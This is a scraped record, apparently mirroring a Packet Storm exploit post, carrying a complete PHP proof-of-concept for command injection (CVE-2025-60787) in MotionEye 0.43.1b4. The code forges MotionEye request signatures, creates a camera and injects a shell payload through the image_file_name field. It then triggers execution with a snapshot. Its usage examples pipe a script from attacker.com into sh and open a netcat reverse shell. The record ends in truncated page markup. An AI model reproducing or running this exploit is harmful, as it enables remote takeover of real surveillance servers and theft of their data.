{“lastseen”:”2026-02-04T17:00:15″,”description”:”Proof of concept exploit for a command injection vulnerability in MotionEye Frontend version 0.43.1b4…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:214899″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-60787″],”sourceData”:”=============================================================================================================================================\\n | # Title : MotionEye Frontend 0.43.1b4 RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/motioneye-project\/motioneye |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/210394\/ \\u0026 \\tCVE-2025-60787\\n \\n [+] Summary : Command Injection in Configuration Files – Unsanitized user input in the image_file_name parameter \\n allows authenticated attackers to inject OS commands via $(command) syntax, leading to remote code execution.\\n \\n [+] POC :\\n \\n php motioneye_rce.php check https:\/\/target-motioneye.local\\n \\n php motioneye_rce.php check https:\/\/192.168.1.100 admin password123\\n \\n \\u003c?php\\n \\n \\n class MotionEyeRCE {\\n private $target;\\n private $username;\\n private $password;\\n private $uri;\\n private $cookies;\\n private $timeout = 30;\\n private $verify_ssl = false;\\n private $camera_id;\\n \\n public function __construct($target, $username = ‘admin’, $password = ”) {\\n $this-\\u003etarget = rtrim($target, ‘\/’);\\n $this-\\u003eusername = $username;\\n $this-\\u003epassword = $password;\\n $this-\\u003ecookies = [];\\n $this-\\u003ecamera_id = null;\\n }\\n \\n \/**\\n * Clean string according to MotionEye’s canonicalization rules\\n *\/\\n private function clean_string($data) {\\n if ($data === null) {\\n return ”;\\n }\\n \\n if (!is_string($data)) {\\n $data = (string)$data;\\n }\\n \\n \/\/ Regex from MotionEye source code\\n $signature_regex = ‘\/[^A-Za-z0-9\\\\\/?_.=\\u0026{}\\\\[\\\\]\\”:, -]\/’;\\n return preg_replace($signature_regex, ‘-‘, $data);\\n }\\n \\n \/**\\n * Compute SHA1 signature for MotionEye requests\\n *\/\\n private function compute_signature($method, $path, $body = null, $key = ”) {\\n \/\/ Parse URL\\n $parsed = parse_url($path);\\n $path_only = $parsed[‘path’] ?? ”;\\n $query_str = $parsed[‘query’] ?? ”;\\n \\n \/\/ Parse query parameters\\n $query_params = [];\\n if ($query_str) {\\n parse_str($query_str, $query_params);\\n }\\n \\n \/\/ Remove _signature parameter\\n unset($query_params[‘_signature’]);\\n \\n \/\/ Sort parameters alphabetically\\n ksort($query_params);\\n \\n \/\/ Build canonical query string\\n $canonical_query = ”;\\n foreach ($query_params as $k =\\u003e $v) {\\n if ($canonical_query !== ”) {\\n $canonical_query .= ‘\\u0026’;\\n }\\n $canonical_query .= $k . ‘=’ . rawurlencode($v);\\n }\\n \\n \/\/ Build canonical path\\n $canonical_path = $path_only;\\n if ($canonical_query !== ”) {\\n $canonical_path .= ‘?’ . $canonical_query;\\n }\\n \\n \/\/ Clean path and body\\n $cleaned_path = $this-\\u003eclean_string($canonical_path);\\n $cleaned_body = $this-\\u003eclean_string($body);\\n \\n \/\/ Compute key hash\\n $key_hash = strtolower(sha1($key));\\n \\n \/\/ Build data to hash\\n $data = $method . ‘:’ . $cleaned_path . ‘:’ . $cleaned_body . ‘:’ . $key_hash;\\n \\n return strtolower(sha1($data));\\n }\\n \\n \/**\\n * Generate timestamp in milliseconds\\n *\/\\n private function generate_timestamp_ms() {\\n return (int)(microtime(true) * 1000);\\n }\\n \\n \/**\\n * Send HTTP request with MotionEye signature\\n *\/\\n private function send_signed_request($method, $path, $data = null, $headers = []) {\\n $url = $this-\\u003etarget . $path;\\n \\n \/\/ Add required GET parameters\\n $get_params = [\\n ‘_username’ =\\u003e $this-\\u003eusername,\\n ‘_’ =\\u003e $this-\\u003egenerate_timestamp_ms()\\n ];\\n \\n \/\/ Parse existing query string if present\\n $parsed = parse_url($url);\\n $base_url = $parsed[‘scheme’] . ‘:\/\/’ . $parsed[‘host’] . ($parsed[‘port’] ? ‘:’ . $parsed[‘port’] : ”) . $parsed[‘path’];\\n $existing_query = [];\\n \\n if (isset($parsed[‘query’])) {\\n parse_str($parsed[‘query’], $existing_query);\\n $get_params = array_merge($get_params, $existing_query);\\n }\\n \\n \/\/ Build query string\\n $query_str = http_build_query($get_params);\\n $path_with_query = $parsed[‘path’] . ‘?’ . $query_str;\\n \\n \/\/ Compute signature\\n $signature = $this-\\u003ecompute_signature(\\n strtoupper($method),\\n $path_with_query,\\n $data,\\n $this-\\u003epassword\\n );\\n \\n \/\/ Add signature to query parameters\\n $get_params[‘_signature’] = $signature;\\n $query_str = http_build_query($get_params);\\n \\n \/\/ Build final URL\\n $final_url = $base_url . ‘?’ . $query_str;\\n \\n \/\/ Prepare request\\n $ch = curl_init();\\n \\n $options = [\\n CURLOPT_URL =\\u003e $final_url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_MAXREDIRS =\\u003e 5,\\n CURLOPT_SSL_VERIFYPEER =\\u003e $this-\\u003everify_ssl,\\n CURLOPT_SSL_VERIFYHOST =\\u003e $this-\\u003everify_ssl ? 2 : 0,\\n CURLOPT_HEADER =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36’,\\n CURLOPT_HTTPHEADER =\\u003e array_merge([\\n ‘Accept: application\/json,text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8’,\\n ‘Accept-Language: en-US,en;q=0.5’,\\n ‘Connection: close’\\n ], $headers)\\n ];\\n \\n if (strtoupper($method) === ‘POST’) {\\n $options[CURLOPT_POST] = true;\\n if ($data !== null) {\\n $options[CURLOPT_POSTFIELDS] = $data;\\n \\n \/\/ Detect content type\\n if (is_array($data)) {\\n $options[CURLOPT_POSTFIELDS] = http_build_query($data);\\n $options[CURLOPT_HTTPHEADER][] = ‘Content-Type: application\/x-www-form-urlencoded’;\\n } else {\\n $options[CURLOPT_POSTFIELDS] = $data;\\n if (json_decode($data) !== null) {\\n $options[CURLOPT_HTTPHEADER][] = ‘Content-Type: application\/json’;\\n }\\n }\\n }\\n }\\n \\n \/\/ Add cookies if any\\n if (!empty($this-\\u003ecookies)) {\\n $cookie_str = ”;\\n foreach ($this-\\u003ecookies as $name =\\u003e $value) {\\n $cookie_str .= $name . ‘=’ . $value . ‘; ‘;\\n }\\n $options[CURLOPT_COOKIE] = rtrim($cookie_str, ‘; ‘);\\n }\\n \\n curl_setopt_array($ch, $options);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n $error = curl_error($ch);\\n \\n curl_close($ch);\\n \\n if ($response === false) {\\n throw new Exception(\\”cURL error: \\” . $error);\\n }\\n \\n $headers = substr($response, 0, $header_size);\\n $body = substr($response, $header_size);\\n \\n \/\/ Extract and store cookies\\n preg_match_all(‘\/^Set-Cookie:\\\\s*([^;]*)\/mi’, $headers, $matches);\\n foreach ($matches[1] as $cookie) {\\n $parts = explode(‘=’, $cookie, 2);\\n if (count($parts) == 2) {\\n $this-\\u003ecookies[$parts[0]] = $parts[1];\\n }\\n }\\n \\n return [\\n ‘code’ =\\u003e $http_code,\\n ‘headers’ =\\u003e $headers,\\n ‘body’ =\\u003e $body\\n ];\\n }\\n \\n \/**\\n * Check if target is vulnerable\\n *\/\\n public function check() {\\n try {\\n $ch = curl_init($this-\\u003etarget);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_SSL_VERIFYPEER =\\u003e $this-\\u003everify_ssl,\\n CURLOPT_SSL_VERIFYHOST =\\u003e $this-\\u003everify_ssl ? 2 : 0,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36’\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($http_code !== 200) {\\n return [‘vulnerable’ =\\u003e false, ‘message’ =\\u003e ‘Target not reachable or not MotionEye’];\\n }\\n \\n \/\/ Look for motionEye version\\n if (preg_match(‘\/motionEye Version.*?\\u003cspan[^\\u003e]*\\u003e([^\\u003c]+)\\u003c\/’, $response, $matches)) {\\n $version = trim($matches[1]);\\n $clean_version = preg_replace(‘\/[a-zA-Z]\/’, ”, $version);\\n \\n if (version_compare($clean_version, ‘0.43.15’, ‘\\u003c’)) {\\n return [\\n ‘vulnerable’ =\\u003e true,\\n ‘message’ =\\u003e \\”Vulnerable version detected: $version\\”,\\n ‘version’ =\\u003e $version\\n ];\\n } else {\\n return [\\n ‘vulnerable’ =\\u003e ‘unknown’,\\n ‘message’ =\\u003e \\”Newer version detected: $version. Check release notes.\\”,\\n ‘version’ =\\u003e $version\\n ];\\n }\\n }\\n \\n return [‘vulnerable’ =\\u003e false, ‘message’ =\\u003e ‘MotionEye version not found’];\\n \\n } catch (Exception $e) {\\n return [‘vulnerable’ =\\u003e false, ‘message’ =\\u003e ‘Error: ‘ . $e-\\u003egetMessage()];\\n }\\n }\\n \\n \/**\\n * Add a camera to MotionEye\\n *\/\\n private function add_camera() {\\n echo \\”[+] Adding malicious camera…\\\\n\\”;\\n \\n $data = json_encode([\\n ‘scheme’ =\\u003e ‘rstp’,\\n ‘host’ =\\u003e $this-\\u003egenerate_ip(),\\n ‘port’ =\\u003e ”,\\n ‘path’ =\\u003e ‘\/’,\\n ‘username’ =\\u003e ”,\\n ‘proto’ =\\u003e ‘netcam’\\n ]);\\n \\n $response = $this-\\u003esend_signed_request(\\n ‘POST’,\\n ‘\/config\/add\/’,\\n $data,\\n [‘Content-Type: application\/json’]\\n );\\n \\n if ($response[‘code’] !== 200) {\\n throw new Exception(\\”Failed to add camera. HTTP {$response[‘code’]}\\”);\\n }\\n \\n $json = json_decode($response[‘body’], true);\\n if (!$json || !isset($json[‘id’])) {\\n throw new Exception(\\”Invalid response when adding camera\\”);\\n }\\n \\n $this-\\u003ecamera_id = $json[‘id’];\\n echo \\”[+] Camera added successfully (ID: {$this-\\u003ecamera_id})\\\\n\\”;\\n \\n return $this-\\u003ecamera_id;\\n }\\n \\n \/**\\n * Configure camera with payload\\n *\/\\n private function configure_camera($payload) {\\n echo \\”[+] Configuring camera with payload…\\\\n\\”;\\n \\n $camera_name = ‘cam_’ . bin2hex(random_bytes(4));\\n $config = [\\n ‘enabled’ =\\u003e true,\\n ‘name’ =\\u003e $camera_name,\\n ‘proto’ =\\u003e ‘netcam’,\\n ‘auto_brightness’ =\\u003e false,\\n ‘rotation’ =\\u003e [0, 90, 180, 270][rand(0, 3)],\\n ‘framerate’ =\\u003e rand(2, 30),\\n ‘privacy_mask’ =\\u003e false,\\n ‘storage_device’ =\\u003e ‘custom-path’,\\n ‘root_directory’ =\\u003e \\”\/var\/lib\/motioneye\/{$camera_name}\\”,\\n ‘upload_enabled’ =\\u003e false,\\n ‘upload_picture’ =\\u003e false,\\n ‘upload_movie’ =\\u003e false,\\n ‘upload_service’ =\\u003e [‘ftp’, ‘sftp’, ‘webdav’][rand(0, 2)],\\n ‘upload_method’ =\\u003e [‘post’, ‘put’][rand(0, 1)],\\n ‘upload_subfolders’ =\\u003e false,\\n ‘web_hook_storage_enabled’ =\\u003e false,\\n ‘command_storage_enabled’ =\\u003e false,\\n ‘text_overlay’ =\\u003e false,\\n ‘text_scale’ =\\u003e rand(1, 3),\\n ‘video_streaming’ =\\u003e false,\\n ‘streaming_framerate’ =\\u003e rand(5, 30),\\n ‘streaming_quality’ =\\u003e rand(50, 95),\\n ‘streaming_resolution’ =\\u003e rand(50, 95),\\n ‘streaming_server_resize’ =\\u003e false,\\n ‘streaming_port’ =\\u003e ‘9081’,\\n ‘streaming_auth_mode’ =\\u003e ‘disabled’,\\n ‘streaming_motion’ =\\u003e false,\\n ‘still_images’ =\\u003e true,\\n ‘image_file_name’ =\\u003e \\”$({$payload})\\”, \/\/ Payload injection point\\n ‘image_quality’ =\\u003e rand(50, 95),\\n ‘capture_mode’ =\\u003e ‘manual’,\\n ‘preserve_pictures’ =\\u003e ‘0’,\\n ‘manual_snapshots’ =\\u003e true,\\n ‘movies’ =\\u003e false,\\n ‘movie_file_name’ =\\u003e ‘%Y-%m-%d\/%H-%M-%S’,\\n ‘movie_quality’ =\\u003e rand(50, 95),\\n ‘movie_format’ =\\u003e ‘mp4 =\\u003e h264_v4l2m2m’,\\n ‘movie_passthrough’ =\\u003e false,\\n ‘recording_mode’ =\\u003e ‘motion-triggered’,\\n ‘max_movie_length’ =\\u003e ‘0’,\\n ‘preserve_movies’ =\\u003e ‘0’,\\n ‘motion_detection’ =\\u003e false,\\n ‘frame_change_threshold’ =\\u003e ‘0.’ . rand(1000000000000000, 9999999999999999),\\n ‘max_frame_change_threshold’ =\\u003e rand(0, 1),\\n ‘auto_threshold_tuning’ =\\u003e false,\\n ‘auto_noise_detect’ =\\u003e false,\\n ‘noise_level’ =\\u003e rand(10, 32),\\n ‘light_switch_detect’ =\\u003e ‘0’,\\n ‘despeckle_filter’ =\\u003e false,\\n ‘event_gap’ =\\u003e rand(5, 30),\\n ‘pre_capture’ =\\u003e rand(1, 5),\\n ‘post_capture’ =\\u003e rand(1, 5),\\n ‘minimum_motion_frames’ =\\u003e rand(20, 30),\\n ‘motion_mask’ =\\u003e false,\\n ‘show_frame_changes’ =\\u003e false,\\n ‘create_debug_media’ =\\u003e false,\\n ’email_notifications_enabled’ =\\u003e false,\\n ‘telegram_notifications_enabled’ =\\u003e false,\\n ‘web_hook_notifications_enabled’ =\\u003e false,\\n ‘web_hook_end_notifications_enabled’ =\\u003e false,\\n ‘command_notifications_enabled’ =\\u003e false,\\n ‘command_end_notifications_enabled’ =\\u003e false,\\n ‘working_schedule’ =\\u003e false,\\n ‘resolution’ =\\u003e [‘320×240’, ‘640×480’, ‘1280×720’][rand(0, 2)]\\n ];\\n \\n $data = json_encode([$this-\\u003ecamera_id =\\u003e $config]);\\n \\n $response = $this-\\u003esend_signed_request(\\n ‘POST’,\\n ‘\/config\/0\/set\/’,\\n $data,\\n [‘Content-Type: application\/json’]\\n );\\n \\n if ($response[‘code’] !== 200) {\\n throw new Exception(\\”Failed to configure camera. HTTP {$response[‘code’]}\\”);\\n }\\n \\n echo \\”[+] Camera configured with payload\\\\n\\”;\\n }\\n \\n \/**\\n * Trigger the exploit by taking a snapshot\\n *\/\\n private function trigger_exploit() {\\n echo \\”[+] Triggering exploit…\\\\n\\”;\\n \\n $response = $this-\\u003esend_signed_request(\\n ‘POST’,\\n \\”\/action\/{$this-\\u003ecamera_id}\/snapshot\/\\”,\\n ‘null’,\\n [‘Content-Type: application\/json’]\\n );\\n \\n if ($response[‘code’] !== 200) {\\n throw new Exception(\\”Failed to trigger exploit. HTTP {$response[‘code’]}\\”);\\n }\\n \\n echo \\”[+] Exploit triggered\\\\n\\”;\\n }\\n \\n \/**\\n * Remove the camera\\n *\/\\n private function remove_camera() {\\n if (!$this-\\u003ecamera_id) {\\n return;\\n }\\n \\n echo \\”[+] Removing camera…\\\\n\\”;\\n \\n try {\\n $response = $this-\\u003esend_signed_request(\\n ‘POST’,\\n \\”\/config\/{$this-\\u003ecamera_id}\/rem\/\\”,\\n ‘null’,\\n [‘Content-Type: application\/json’]\\n );\\n \\n if ($response[‘code’] === 200) {\\n echo \\”[+] Camera removed successfully\\\\n\\”;\\n }\\n } catch (Exception $e) {\\n echo \\”[-] Error removing camera: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n \\n $this-\\u003ecamera_id = null;\\n }\\n \\n \/**\\n * Generate random IP address\\n *\/\\n private function generate_ip() {\\n return rand(1, 254) . ‘.’ . rand(0, 254) . ‘.’ . rand(0, 254) . ‘.’ . rand(1, 254);\\n }\\n \\n \/**\\n * Execute exploit\\n *\/\\n public function exploit($payload) {\\n try {\\n \/\/ Check target first\\n $check = $this-\\u003echeck();\\n if (!$check[‘vulnerable’]) {\\n echo \\”[-] Target appears not to be vulnerable: \\” . $check[‘message’] . \\”\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[+] Target appears to be vulnerable\\\\n\\”;\\n \\n \/\/ Add camera\\n $this-\\u003eadd_camera();\\n \\n \/\/ Configure with payload\\n $this-\\u003econfigure_camera($payload);\\n \\n \/\/ Trigger exploit\\n $this-\\u003etrigger_exploit();\\n \\n echo \\”[+] Exploit completed. Check for callback.\\\\n\\”;\\n \\n return true;\\n \\n } catch (Exception $e) {\\n echo \\”[-] Exploit failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n \\n \/\/ Clean up\\n $this-\\u003eremove_camera();\\n \\n return false;\\n }\\n }\\n \\n \/**\\n * Clean up resources\\n *\/\\n public function cleanup() {\\n $this-\\u003eremove_camera();\\n }\\n \\n public function __destruct() {\\n $this-\\u003ecleanup();\\n }\\n }\\n \\n \/**\\n * Command-line interface\\n *\/\\n if (php_sapi_name() === ‘cli’) {\\n if ($argc \\u003c 2) {\\n echo \\”MotionEye RCE Exploit (CVE-2025-60787)\\\\n\\”;\\n echo \\”Usage:\\\\n\\”;\\n echo \\” php {$argv[0]} check \\u003curl\\u003e [username] [password]\\\\n\\”;\\n echo \\” php {$argv[0]} exploit \\u003curl\\u003e \\u003cpayload\\u003e [username] [password]\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php {$argv[0]} check https:\/\/192.168.1.100\\\\n\\”;\\n echo \\” php {$argv[0]} exploit https:\/\/192.168.1.100 ‘curl http:\/\/attacker.com\/shell.sh|sh’\\\\n\\”;\\n echo \\” php {$argv[0]} exploit https:\/\/192.168.1.100 ‘nc -e \/bin\/bash 192.168.1.50 4444’ admin password123\\\\n\\”;\\n exit(1);\\n }\\n \\n $command = $argv[1];\\n $url = $argv[2] ?? ”;\\n \\n if ($command === ‘check’) {\\n $username = $argv[3] ?? ‘admin’;\\n $password = $argv[4] ?? ”;\\n \\n $exploit = new MotionEyeRCE($url, $username, $password);\\n $result = $exploit-\\u003echeck();\\n \\n echo \\”Target: $url\\\\n\\”;\\n echo \\”Status: \\” . $result[‘message’] . \\”\\\\n\\”;\\n if (isset($result[‘version’])) {\\n echo \\”Version: \\” . $result[‘version’] . \\”\\\\n\\”;\\n }\\n \\n } elseif ($command === ‘exploit’) {\\n $payload = $argv[3] ?? ”;\\n $username = $argv[4] ?? ‘admin’;\\n $password = $argv[5] ?? ”;\\n \\n if (!$payload) {\\n echo \\”[-] Payload required for exploit command\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new MotionEyeRCE($url, $username, $password);\\n $exploit-\\u003eexploit($payload);\\n \\n } else {\\n echo \\”[-] Unknown command: $command\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214899″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214899\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-04T17:00:15″,”description”:”Proof of concept exploit for a command injection vulnerability in MotionEye Frontend version 0.43.1b4…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:214899″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-60787″],”sourceData”:”=============================================================================================================================================\\n | # Title : MotionEye Frontend…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-39065","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n